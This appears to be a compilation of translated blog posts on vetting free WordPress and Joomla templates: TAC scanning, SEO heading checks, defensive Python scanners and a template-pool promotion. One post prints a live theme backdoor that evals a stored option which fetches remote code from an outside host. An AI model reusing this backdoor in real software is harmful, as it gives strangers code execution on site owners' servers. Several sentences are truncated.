TAC plugin or how to check a template for external links. How to protect yourself from hidden links and viruses in templates for Joomla and WordPress? How to check a template for malicious code

A large number of free themes and templates have been created for the WordPress engine. All we have to do is find the right template, download it and install it on our blog. This is exactly what many novice webmasters do, without considering that these templates may be unsafe for their future site. Templates are often created by ordinary users of the WordPress engine.

Some creators place a bunch of external links in their templates, and these can lead to very dubious sites. For example, a template may contain a large number of links to sexual resources. These links are not visible on the page. However, a search robot will index them anyway and give those sites a part of your citation index. In addition, various sanctions can be applied to your resource if there are too many links to suspicious sites. The question arises: what to do with such free templates? By the way, paid templates also quite often contain hidden links.

How to check a template for external links?

A plugin called TAC (the abbreviation stands for Theme Authenticity Checker) will help you check a template for external links hidden in it. You can download it from the official WordPress site. This plugin is completely free and easy to install and use.

After activating TAC, go to its page under "Appearance" - "TAC". There you can see the scan results for all the themes installed on your blog. If everything is OK with a theme, a green rectangle with the inscription "Theme OK!" appears next to its name.

Keep in mind that this inscription only means the absence of encoded links. All other external links are listed below it. Study these links carefully and check where they lead. As a rule, each template has a link to the site of its creator. Usually this link is visible to blog visitors and is located in the footer.

Among webmasters, it is customary not to remove such links, as a kind of tribute to the author who made the template for you for free. If the template contains links to some other sites, it is better to delete them. You can do this by opening the relevant template file.
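A simplified static check of the kind described above, as an added example that is not TAC's own code: it lists the external hosts written in the clear in a theme file and separately reports hosts that only appear after decoding base64 string literals. The function names, the sample footer and all `example.invalid` hosts are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# Quoted string literals that look like base64 (24+ characters).
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


def hosts_in(text):
    """Return the set of host names of all http(s) URLs found in text."""
    hosts = set()
    for url in URL.findall(text):
        try:
            host = urlsplit(url).hostname
        except ValueError:  # malformed URL, e.g. a broken IPv6 literal
            continue
        if host:
            hosts.add(host)
    return hosts


def decoded_literals(src):
    """Yield the decoded text of every string literal that is valid base64."""
    for literal in B64_LITERAL.findall(src):
        try:
            raw = base64.b64decode(literal, validate=True)
        except (binascii.Error, ValueError):
            continue
        yield raw.decode("utf-8", "replace")


def scan_theme_file(src, own_hosts=()):
    """Separate external hosts written in the clear from those hidden in base64."""
    own = set(own_hosts)
    encoded = set()
    for text in decoded_literals(src):
        encoded |= hosts_in(text)
    return {"plain": sorted(hosts_in(src) - own), "encoded": sorted(encoded - own)}


# Constructed sample footer.php: one visible author credit, one base64-wrapped link.
_HIDDEN = base64.b64encode(b'<a href="http://unrelated.example.invalid/">.</a>').decode()
SAMPLE_FOOTER = f"""<div id="footer">
  <a href="https://blog.example.invalid/">Home</a>
  <a href="https://theme-author.example.invalid/">Theme by Author</a>
  <?php echo base64_decode('{_HIDDEN}'); ?>
</div>"""

if __name__ == "__main__":
    print(scan_theme_file(SAMPLE_FOOTER, own_hosts={"blog.example.invalid"}))
```

Any host in the `encoded` list deserves a look first: a credit link to the template author has no reason to be encoded.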

    I scanned the template for them and it showed - ok. Although something adds a link to wp-load.php. What else do you recommend?

    There are a lot of free website templates on the Internet. Everyone knows that free cheese is found only in a mousetrap, and still the hand reaches out to download such a freebie and install it on the website.

    Before installing a free template, it would not hurt to check it for hidden links.

    When installing a free template, many do not even realize that they simply will not be able to promote such a site and earn money on it.

    A single such template can contain several links at once. It’s good if the embedded links point to a site with a subject similar to yours, and not to sites for adults, and if there are only two or three of them, not dozens.

    How does installing such a free template threaten your site? The site will fall under the filter, getting out of which is almost impossible. A site under filters is a dead site!
    Installing a free template on your site is like playing Russian roulette. Only the chance to install a completely clean template is zero.

    At best, you will get 3-5 unwanted links on your site. You can, of course, try to clean up such a template, but there are craftsmen who embed links in the template in such a way that they cannot be removed (the template breaks or its layout warps).

    To be honest, it’s easier to order a new clean and unique (which can’t be said about free) template, it will cost less.

    But what if you have already bet on a free template? How to check a template for hidden links?

    There is a special plugin for this. It will not help remove these links, but it will identify them.

    Perhaps not everything is so scary and your template has only a couple of external links! Do you want to test the template? Then download the plugin from the link below.

    The plugin is installed in the site admin panel in the standard way. There is no point in making a video about this, so today we will manage with a couple of screenshots.

    Install the plugin and activate it.

    Go to the Appearance → TAC tab.

    After you have chosen a template to install on your WordPress site, it is worth checking its layout for compliance with the basic rules of SEO (optimization). For example, the out-of-the-box template "Twenty Fourteen" is laid out so that the titles of the widgets are output in <h1> tags, which may adversely affect the promotion of the site. There are other shortcomings in the layout of templates that need to be eliminated before filling the site with materials and opening it to search engines.

    It is extremely difficult to find a ready-made WordPress template that fully meets your needs. Quite often you like the selected template but do not like its color scheme, or the location of the sidebar, the header, the font, etc. The WP platform gives you every opportunity to adapt a WordPress template to your needs.

    For example, let's modify the out-of-the-box WordPress template called "Twenty Fourteen". This template will be a practical example where you can see all the nuances of tuning WordPress templates, fine and otherwise.

    Preparing to Edit a Template

    Before any work with WordPress code, including changing the working template, you need to do and have at hand:

    • (catalog and database) ;
    • A backup copy of the working (edited) template.

    The template must be preconfigured on the Appearance→Customize tab.

    Note: To make non-resettable changes to a template, you need to switch to . Work on the child WordPress theme allows you to update the template without losing your changes.

    How to Customize Twenty Fourteen WordPress Theme

    I will try to show the principle of changing the template, which will allow you to make your own changes to any WordPress template.

    So the task is: there is the "Twenty Fourteen" template; we make custom changes to it and, at the same time, check its layout for compliance with the rules of SEO optimization.

    Note: the authors of many templates expose configurable settings for their template on a separate tab. Working with such templates, you can easily set custom template settings without changing the template code. This is not the option described in this article.

    Checking the layout of the template for SEO rules

    Let's deal with the layout of the template first. Before checking, we set the provided template settings.

    To check the layout for compliance with SEO rules, we need:

    • Place any widget on the sidebar(s) of the template. Let it be a calendar. Be sure to give the widget a name.
    • Create a test page and a test post.

    Steps for Checking Template Layout for SEO Rules

    Step 1. Checking the main page

    1. Open the home page of the site. Any browser has developer tools; the simplest way to open them is the right mouse button (in Chrome, "View code").
    2. On the home page (the page of the latest posts), look at the code of the site title. If it is text, it should be in h1 tags. If it is an image, it should NOT be in h1 tags.

    Important! No page on your site should have more than two h1 tags: one opening <h1>, the second closing </h1>.


    3. In order not to “poke” every heading on the page, open “Page code” from the right mouse button and search the page (Ctrl+F) for “h1”. If the search finds more than two h1 tags, look at what they frame and try to fix it. The correction is described below.
    4. Article announcements (in our example, one test article): the announcement title should be in h2 tags. If the titles of article announcements are in h1 or h3 tags, this needs to be corrected. The correction is described below.
    5. All widget titles must be in h3 or h4 tags. This site is laid out so that widget titles are wrapped in <h1> tags; this needs to be corrected. The correction is described below.

    I repeat! No page on your site should have more than two h1 tags: one opening <h1>, the second closing </h1>.


    Step 2: Testing the Test Post Page

    After the main page of the site, open the test post. Here we check that only the title of the post is wrapped in h1 tags. We do the check in the same way as before. It is necessary that h1 tags wrap only the title of the page.

    Step 3. Checking Widgets

    Similarly, look at the widget title tags in the sidebar and footer.


    Layout check results

    As a result of checking the layout of this template, we found that the headers of the widgets in the footer and sidebar of the site are wrapped in h1 tags. This needs to be fixed.

    1. To fix it, go to the template directory and open the functions.php file for editing. By “go to the template directory” we mean copying the desired file (you can do it from the console editor) and editing it in a text editor like Notepad++.
    2. In the functions.php file, look for how widgets are displayed in the template. For this template, we see that the widget titles are in h1. Change h1 to h3.
    3. If the widget header type is not set in the functions.php file, go to the footer.php file and see how the header of the widgets in the footer is wrapped in this file. Change h1 to h3.

    If we found that home page article announcements are displayed in h1 tags, that is, on the page of recent posts, there are several headings in h1, we read the article and eliminate this SEO layout error.

    The topic of the article turned out to be bigger than I expected, so changing the WordPress template for yourself, namely changing its appearance, will be in the next article. Beforehand, you can read the articles: Layout Rules for the WordPress Cascading Styles File.

    Hello friends. Are you sure that the free WordPress template that you use for your websites and blogs is really safe and does not contain hidden threats and malicious code? Are you completely sure of this? Absolutely?)

    You think you ran the template through, removed hidden links from it, and the job is done. You periodically scan the site files with an antivirus, look into the Yandex webmaster tools in the Security tab and, with relief, see a message there: “No malicious code found on the site”.

    That's what I thought too. I don't want to upset you, but...

    Hidden Dangerous Code in Free WordPress Themes

    This is the letter I received last week in the mail from my hosting. Recently, they introduced a regular check of all site files for malicious content, and they did find such content on my site!

    It all started when one day I went to my site and could not load it: an error message about missing files with the php extension came up. A little tense, I went to study the contents of the site folder on the hosting and immediately discovered the problem: my functions.php template file had been renamed to functions.php.malware, which hinted, as it were, that an antivirus or something like it had been at work here. When I checked my mail, I found the above report from the hoster.

    The first thing I did, of course, was to check this file: I studied its contents and scanned it with various antiviruses, dozens of online virus-checking services, etc. In the end, I didn’t find anything; everyone unanimously claimed that the file was completely safe. Of course, I expressed my doubts to the hoster, saying that they had messed something up, but just in case I asked them to provide a report on the discovery of the malicious piece of code.

    And this is what they told me

    I went to google information about this code and seriously thought about it ...

    How to find a piece of malicious code in a template

    As it turned out, this is a really non-trivial trick that allows interested parties to transfer data to your site and change the content of pages without your knowledge! If you are using a free template, then I highly recommend checking your functions.php for the following code:

    add_filter('the_content', '_bloginfo', 10001);
    function _bloginfo($content){
        global $post;
        // runs whatever PHP code is stored in the 'blogoption' database option
        if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
            return $co;
        } else return $content;
    }

    Even with my very shallow knowledge of php, it can be seen that a filter is being created that is tied to the global variable post and to content, and that it is responsible for displaying content only on blog post pages (the is_single condition). Already suspicious, isn't it? Well, now let's see what this code is going to display on our website.

    The blogoption requested from the database also looks very suspicious. We go to our MySQL database and find there a table called wp_options (if you did not change the prefix, this is its default name). In it we find the row of interest, called blogoption.

    What a beauty! We see the following option

    return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

    That is, a certain site (a Russian one, mind you) returns content to us that can carry anything! Any number of links, malicious code, altered text, etc. The site itself, when accessed, gives a 403 access error, which is not surprising. Of course, I also removed this option from the database.

    According to information from the victims, usually exactly the content of your article is returned, with only one modification: in place of some dot "." in the text there was a disguised open link! And by the way, this option is written to the database when the template itself is installed, and then the code that does this safely self-destructs. And I lived with such rubbish for two years, and not a single antivirus or service revealed this threat to me in all that time. To be honest, I didn’t notice whether this technique ever worked on my site, or whether my security plugin blocked this possibility (or maybe one of the WordPress updates closed this hole), but it’s still unpleasant.
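One way to automate the check described above, as an added example that is not from the original post: it flags hook callbacks in theme source that pass a database option or fetched data straight to `eval()`, then audits `wp_options` rows for values that contain executable PHP. The function names, the sample `functions.php`, the option rows and the `example.invalid` URL are constructed for illustration, and the brace matching is naive (it assumes no braces inside string literals).

```python
import re

HOOK = re.compile(r"add_(?:filter|action)\s*\(\s*['\"]([\w.-]+)['\"]\s*,\s*['\"](\w+)['\"]")
FUNC = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
# eval()/assert()/create_function() fed directly by stored or fetched data.
DYNAMIC_EXEC = re.compile(
    r"\b(?:eval|assert|create_function)\s*\(\s*@?\s*"
    r"(get_option|get_site_option|file_get_contents|base64_decode|gzinflate)\s*\(", re.I)
OPTION_NAME = re.compile(r"get_option\s*\(\s*['\"]([^'\"]+)['\"]")
CODE_IN_VALUE = re.compile(r"\b(?:eval|assert|base64_decode|gzinflate|file_get_contents)\s*\(", re.I)


def function_bodies(src):
    """Map each named PHP function to its body using naive brace matching."""
    bodies = {}
    for m in FUNC.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        bodies[m.group(1)] = src[m.end():i]
    return bodies


def scan_theme_source(src):
    """Report hooks whose callback executes stored or fetched data as code."""
    bodies = function_bodies(src)
    findings = []
    for m in HOOK.finditer(src):
        hook, callback = m.groups()
        body = bodies.get(callback, "")
        hit = DYNAMIC_EXEC.search(body)
        if hit:
            findings.append({
                "hook": hook,
                "callback": callback,
                "line": src.count("\n", 0, m.start()) + 1,
                "source": hit.group(1).lower(),
                "options": OPTION_NAME.findall(body),
            })
    return findings


def audit_options(rows, referenced=()):
    """rows: (option_name, option_value) pairs exported from wp_options."""
    referenced = set(referenced)
    report = []
    for name, value in rows:
        reasons = []
        if name in referenced:
            reasons.append("evaluated by theme code")
        if CODE_IN_VALUE.search(value):
            reasons.append("value contains executable PHP calls")
        if reasons:
            report.append((name, reasons))
    return report


# Constructed sample input: a functions.php with one benign and one malicious hook.
SAMPLE_FUNCTIONS_PHP = r"""<?php
add_action('after_setup_theme', 'mytheme_setup');
function mytheme_setup() {
    add_theme_support('post-thumbnails');
}
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
    global $post;
    if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
        return $co;
    } else return $content;
}
"""
# Constructed wp_options rows; the URL is a placeholder.
SAMPLE_OPTIONS = [
    ("siteurl", "https://blog.example.invalid"),
    ("blogname", "My blog"),
    ("blogoption", "return eval(file_get_contents('http://host.example.invalid/x.php?id='.$post->ID));"),
]

if __name__ == "__main__":
    found = scan_theme_source(SAMPLE_FUNCTIONS_PHP)
    print(found)
    print(audit_options(SAMPLE_OPTIONS, referenced=found[0]["options"]))
```

Both halves matter: the option name can be anything, so the option audit also flags code-like values that no scanned file refers to.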

    Moral of the free cheese

    How do you like the sophistication of our "translators" of templates (or of those who post them in their catalogs)? This is not like cutting links out of the footer. It’s a pity I don’t remember where I downloaded my template from, it was a long time ago, otherwise I would have written them a couple of affectionate words. And if at that time I had had the experience that I have now, I would definitely not have used a free template, or, in extreme cases, would not have downloaded it from unknown sources!

    It’s easier to buy some official premium template for 15-20 bucks on the same one and live in peace, knowing that there are no holes and encrypted links in it, and that even if there are vulnerabilities, the developers will definitely release an update in which these holes are closed. (By the way, Artem recently published an article where he talks about premium templates and even distributes promotional codes for brutal discounts for those who are interested.)

    Hello, dear readers of the blog site. Nowadays few webmasters build their site themselves (in pure HTML, on their own engine, or at least with hand-made templates for a CMS). In general, this is reasonable, because not everyone is able to create something worthwhile: that takes the talent of a designer. Most often the result is at least “not very good”, and sometimes “just awful”.

    That is why templates or themes (different engines use different terms for “skins”) for popular CMSs have become so widespread. An especially large number of them can be found on the Internet for Joomla and WordPress, because it is rightfully, both in Runet and abroad.

    Actually, Russian-language resources with catalogs of ready-made templates alone are already quite numerous, and abroad they are beyond counting. Everything seems so wonderful: install the engine, find a suitable template (it's no secret that paid templates are not so difficult to find in free access), download it and enjoy the professional design of your brand new website. All that remains is to add valuable content to it, and you will be able to watch the popularity of your resource grow.

    But not everything is so simple and obvious. When I wrote an article a long time ago, I quite regularly received recommendations from readers by mail to remove this or that service from the list, because hidden links or even viruses had been found in its templates. It turns out that the proverb does not lie: free cheese is only in a mousetrap. Developers of free templates (or those who "null" paid ones) simply make money this way and, judging by the scale, a lot of it.

    Hidden links to third-party resources (often blacklisted by search engines), and even more so viruses, can kill all hopes for the promotion of your resource (or seriously undermine them and fray your nerves). For this, you can either. How to protect yourself from all this when choosing a template?

    What's wrong with free templates for Joomla and WordPress?

    From my own experience, I can say that it is very difficult for an “amateur” to compete with a “professional”. At the very beginning of this publication, I provided a link to an article about viruses that infected most of my sites. This happened more than two years ago, and during this time I have gone through the epic struggle for "clean code" more than once, but relapses still occur with enviable regularity on a number of infected resources (now spam is sent from them, now a doorway page is created, now something completely incomprehensible to me happens that leads to a monstrously large load on the hosting).

    At the same time, I use all the methods available to a “noob” to search for shells and other backdoors in the code of these sites, but, I repeat, an amateur simply cannot compete with the pros. Therefore, if you think that you can easily remove a virus that crept in through a template, you are most likely mistaken. This business is very tedious, terribly annoying (when viral activity appears again and again despite all your efforts) and takes a lot of time and effort.

    The same applies to hidden links. It’s good if you come across an implementation from a past era, where it is easy to find the place of insertion and get rid of the links forever, resulting in a clean and free template. In most cases, everything is much more complicated. To find the place where hidden links are inserted, you will need software (for example, the TAC plugin), but it is not omnipotent: distributing links through free and paid (hacked) templates for Joomla and WordPress brings a very good income, which encourages the people who practice it to look for new ways of making their "bookmarks" (planted code) hard to notice.

    Today it is quite difficult even to quickly check whether a template generates unwanted links. For example, you downloaded a template, put it on the site, added content and decided to see whether any suspicious external links (not placed by you) appeared. There are none. You are happy, forget about this problem, fill the site and promote it, and then suddenly discover (by yourself or after a signal from search engines in the form of a filter or a ban) that there are hidden links after all, and that they lead to such "muck" as you yourself would never have thought of linking to.

    The most annoying thing is that removing the filter and “whitewashing” the site in the eyes of search engines can take a very long time (months and even years in some cases). The point is that the developers of such “bookmarks” are aware that you know about them and that you check the site after installing the template for “any bad excesses”. Therefore, they delay the start of link generation for a period which, in their opinion, is long enough for even the most suspicious user to believe in the purity of the template he got for free.

    Moreover, hidden links are now encoded in such a way that they cannot be found by searching for the words md5 or base64 (often they are loaded from an external source altogether). They are just a set of letters and special characters that cannot be found by any search through the template files, and there can be more than a hundred of these files. In addition, the links do not appear immediately. That is, in fact, it is impossible for an (average) webmaster to detect them at the stage of creating a site.
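Because such links can be loaded from outside and switched on after a delay, a check of the rendered page against an allowlist of hosts, repeated periodically, does not depend on how the link was hidden in the template files. The following is an added example, not code from the original article: the `LinkAudit` and `audit_page` names, the allowlist and the sample HTML are constructed, and fetching the page is left out so that the block runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0|text-indent\s*:\s*-\d{3,}", re.I)
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}


class LinkAudit(HTMLParser):
    """Collect every <a href> with its anchor text and whether an inline style hides it."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []      # (tag, hidden) for every open element
        self.links = []      # finished links
        self._current = None # link whose text is being read

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDDEN_STYLE.search(attrs.get("style") or "")) \
            or bool(self.stack and self.stack[-1][1])   # inherited from an ancestor
        if tag not in VOID:
            self.stack.append((tag, hidden))
        if tag == "a" and attrs.get("href"):
            self._current = {"href": attrs["href"], "text": "", "hidden": hidden}

    def handle_endtag(self, tag):
        # Pop back to the matching open tag, tolerating unclosed elements.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break
        if tag == "a" and self._current is not None:
            self.links.append(self._current)
            self._current = None

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data


def audit_page(html, allowed_hosts):
    """Return (host, anchor_text, reasons) for every link to a host not on the allowlist."""
    parser = LinkAudit()
    parser.feed(html)
    parser.close()
    findings = []
    for link in parser.links:
        host = urlsplit(link["href"]).hostname
        if host is None or host in allowed_hosts:
            continue  # relative link or allowlisted host
        reasons = ["host not on allowlist"]
        text = link["text"].strip()
        if link["hidden"]:
            reasons.append("hidden by inline style")
        if not any(ch.isalnum() for ch in text):
            reasons.append("anchor text has no letters or digits")
        findings.append((host, text, reasons))
    return findings


# Constructed sample of a rendered post page.
ALLOWED_HOSTS = {"blog.example.invalid", "theme-author.example.invalid"}
SAMPLE_PAGE = """<html><body>
<h1>Post title</h1>
<p>First sentence<a href="http://links.example.invalid/a">.</a> Second sentence.</p>
<p>See <a href="/about/">about</a> and <a href="https://blog.example.invalid/contact">contact</a>.</p>
<div style="display:none"><a href="http://other.example.invalid/">cheap stuff</a></div>
<footer><a href="https://theme-author.example.invalid/">Theme by Author</a><br></footer>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_page(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(finding)
```

Links hidden through an external stylesheet or script are still listed as off-allowlist hosts, only without the "hidden" reason, so the allowlist comparison is the part to rely on.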

    Well, in order to avoid infection through a template, I prefer to pay so as not to rake up a pile of problems later. Another thing is that you can pay a lot of money, or you can pay not very much. I personally choose the second option, but first I will explain the essence of the first.

    Something, of course, can be found in the official repositories of these engines (read about that and go to the official website of extensions for Joomla), but, firstly, the choice there is significantly limited, and secondly, many thousands of other sites around the world will be wearing the same “clothes”, which somewhat reduces the uniqueness of your project in the eyes of both visitors and search engines.

    However, there are many professional companies in the world that develop paid templates for Joomla and WordPress. A priori, they should not have "bookmarks", otherwise they would instantly lose the credibility and trust of customers. However, the price for one template can be 50-100 dollars, depending on its functionality and novelty.

    In addition, there may be some problems with payment (you will either have to take a chance and make a purchase with payment directly from a plastic card). However, as a result, you will get a deliberately “clean” template, which is good. True, the technical support that comes with it will be relevant only if you know the language in which it is carried out. In most cases, knowledge of the Russian language will not help you in this matter.

    I like the second option more because of its better value (the ratio of money spent to opportunities received), although in relation to developers it is not entirely “white”. Its essence lies in the fact that Joomla and WordPress are distributed under a GNU/GPL type license, i.e. a free software license (such software may be used, copied, modified and distributed). Actually, I already wrote about this earlier in the article about Joomla templates mentioned at the very beginning.

    Without going into too much detail, the bottom line is that extensions (templates, plug-ins, etc.) for these engines cannot be the private property of the authors. Yes, you can charge a fee for them, but it will no longer be possible to punish or prosecute for unauthorized use or distribution of these extensions. Despite this, the market for paid extensions for Joomla and WordPress is huge, although not protected by copyright law. On the contrary, the GNU/GPL license 100% protects you from the developer.

    Many developer companies, by the way, provide access to their templates by subscription. That is, you pay a certain amount and within a certain time can download all their creations (templates or extensions) and continue to use them on an ongoing basis. Actually, the second way to securely obtain themes for WordPress, as well as templates for Joomla, is based on approximately the same principle.

    My friend, whom I have mentioned in a number of articles, pointed it out to me not so long ago (he has been looking for the ideal option for building an online store for several years, and along the way he finds a lot of things that seem interesting to me and that I actively use afterwards). We are talking about a pool of premium templates and extensions, CmsHeaven.org.

    The essence of a pooled purchase is quite simple: a product is bought and distributed to everyone who took part in the pool. CmsHeaven.org has simplified the scheme even more: there is no need to chip in for the separate templates or extensions that you need. You simply pay for temporary access to the entire catalog that this service has at its disposal (several thousand titles, broken down by engines, authors and topics for ease of searching).

    Each of the presented products was honestly bought from the developers with the money of the pool's contributors (there are also free templates, but again they are offered by well-known brands, which need them for advertising purposes). And what is important, the organizers constantly replenish the catalog with new items (piping hot, as they say), which would take a long time to appear in public access. Many people will like it.

    In general, it is a kind of cooperative that you can join and enjoy all the benefits, but with some restrictions. The fact is that the organizers are well aware that without restrictions their entire catalog would leak into public access in no time. Therefore, there is a limit of 36 downloads per month. This is quite enough for an ordinary webmaster, and even for a website development company.

    At the same time, the absence of "bookmarks" in the presented extensions and templates is guaranteed (hidden links, viruses, trojans and "snitchers" that inform the developer about the site using their template). In view of this, only open-source products of well-known brands are bought, where all this can be checked and, if necessary, fixed.

    Some of the extensions have been translated into Russian, and if there are problems with installation or configuration, which is often necessary (probably, the Internet has been combed more than once in search of a solution to a problem that has arisen out of the blue). By the way, this is what distinguishes free engines from paid ones, that there is no user support as such.

    Yes, and you can download the products you like at a normal speed and without viewing ads on file hosting. A trifle, because to get the coveted "nyashki" you can move mountains, and not only fight with a file hosting service, but comfort is made up of trifles.

    In general, I really liked the idea and its implementation, but whether to use free templates from the Joomla and WordPress repositories, whether to join the pool on CmsHeaven.org or buy templates directly from developers you will have to decide for yourself. Only “I beg you, do not eat raw tomatoes at night”, that is, do not download free products from any “wonderful” resources, because you can get a lot of problems in the load. Do you need it?

    Good luck to you!

